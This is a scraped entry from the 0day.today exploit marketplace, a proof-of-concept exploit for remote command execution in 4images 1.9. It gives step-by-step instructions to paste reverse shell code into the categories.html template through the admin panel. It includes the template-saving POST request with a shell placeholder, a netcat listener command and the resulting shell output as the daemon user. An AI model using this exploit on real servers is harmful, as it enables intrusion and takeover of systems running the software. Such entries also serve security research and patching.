0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
4images 1.9 Remote Command Execution Vulnerability
# Exploit Title: 4images 1.9 - Remote Command Execution # Exploit Author: Andrey Stoykov # Software Link: https://www.4homepages.de/download-4images # Version: 1.9 # Tested on: Ubuntu 20.04 To reproduce do the following: 1. Login as administrator user 2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "default_960px" -> "Load Theme" 3. Select Template "categories.html" 4. Paste reverse shell code 5. Click "Save Changes" 6. Browse to "http://host/4images/categories.php?cat_id=1" // HTTP POST request showing reverse shell payload POST /4images/admin/templates.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 [...] __csrf=c39b7dea0ff15442681362d2a583c7a9&action=savetemplate&content=[REVERSE_SHELL_CODE]&template_file_name=categories.html&template_folder=default_960px[...] // HTTP redirect response to specific template GET /4images/categories.php?cat_id=1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 [...] # nc -kvlp 4444 listening on [any] 4444 ... connect to [127.0.0.1] from localhost [127.0.0.1] 43032 Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (2022-11-07) x86_64 GNU/Linux 13:54:28 up 2:18, 2 users, load average: 0.09, 0.68, 0.56 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT kali tty7 :0 11:58 2:18m 2:21 0.48s xfce4-session kali pts/1 - 11:58 1:40 24.60s 0.14s sudo su uid=1(daemon) gid=1(daemon) groups=1(daemon) /bin/sh: 0: can't access tty; job control turned off $ # 0day.today [2024-06-27] #